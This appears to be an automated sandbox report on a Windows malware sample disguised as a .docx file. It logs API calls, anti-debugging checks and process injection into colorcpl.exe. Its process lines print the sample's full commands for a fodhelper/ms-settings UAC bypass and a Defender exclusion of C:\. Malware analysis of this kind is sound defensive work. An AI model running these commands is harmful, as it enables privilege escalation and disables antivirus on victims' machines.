              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,14_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,17_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,17_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,17_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,17_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,17_2_00007FF64B5635B8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04589665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_04589665
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04589253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_04589253
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0459C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,31_2_0459C291
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,31_2_0458C34D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,31_2_0458BD37
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045CE879 FindFirstFileExA,31_2_045CE879
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,31_2_0458880C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458783C FindFirstFileW,FindNextFileW,31_2_0458783C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04599AF5 FindFirstFileW,FindNextFileW,FindNextFileW,31_2_04599AF5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,31_2_0458BB30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04587C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,31_2_04587C97
              Source: C:\Users\Public\xkn.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmpJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.tmpJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user~1\Jump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user\AppData\Local\Temp\D2F6.tmpJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user~1\AppData\Jump to behavior
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.0000000000864000.00000004.00000020.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.00000000007FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeAPI call chain: ExitProcess graph end nodegraph_0-32947
              Source: C:\Windows\SysWOW64\colorcpl.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299D920 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process queried: DebugFlags
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5863FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW
              Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A0A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029DF3AD mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045C32B5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_06421082 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_06463F64 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56CD90 GetProcessHeap,RtlAllocateHeap
              Source: C:\Users\Public\xkn.exe | Process token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_004098F0 SetUnhandledExceptionFilter
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_004099EC SetUnhandledExceptionFilter
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_004098F0 SetUnhandledExceptionFilter
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_004099EC SetUnhandledExceptionFilter
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5793B0 SetUnhandledExceptionFilter
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5793B0 SetUnhandledExceptionFilter
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5793B0 SetUnhandledExceptionFilter
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B5793B0 SetUnhandledExceptionFilter
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B5793B0 SetUnhandledExceptionFilter
              Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A0ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A0F050 SetUnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B4B47 SetUnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045BBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\Public\xkn.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Memory allocated: C:\Users\Public\Libraries\drbdmeyP.pif base: 400000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Memory allocated: C:\Users\Public\Libraries\drbdmeyP.pif base: 18160000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6420000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6421617
              Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6420000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section unmapped: C:\Users\Public\Libraries\drbdmeyP.pif base address: 400000
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Memory written: C:\Users\Public\Libraries\drbdmeyP.pif base: 3F8008
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6420000
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045920F7 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04599627 mouse_event
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pif
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
              Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: C:\Users\Public\alpha.exe | Process created: unknown unknown
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
              Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerQ3\
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managern.
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager404
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager404:0
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerknown.
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager404n.
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, logs.dat.31.dr | Binary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B4C52 cpuid
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299DAA4 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02985A78 GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029A5E01 GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0298A7A0 GetLocaleInfoA
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0298A754 GetLocaleInfoA
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02985B84 lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299DAA4 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5751EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B566EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B573140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5751EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B566EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B573140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5751EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B566EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B573140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B5751EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,14_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,14_2_00007FF64B573140
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,17_2_00007FF64B5751EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,17_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,17_2_00007FF64B573140
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,31_2_045C8404
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,31_2_045D243C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,31_2_045D2543
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,31_2_045D2610
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,31_2_045D2036
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,31_2_045D20C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,31_2_045D2313
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,31_2_045D1CD8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,31_2_045D1F50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,31_2_045D1F9B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,31_2_0458F8D1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,31_2_045C88ED
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation (12 identical entries, one per cmd.exe process)
Source: C:\Users\Public\alpha.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\xkn.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\Public\xkn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\Public\xkn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\Public\xkn.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0298919C GetLocalTime 0_2_0298919C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0459B60D GetUserNameW 31_2_0459B60D
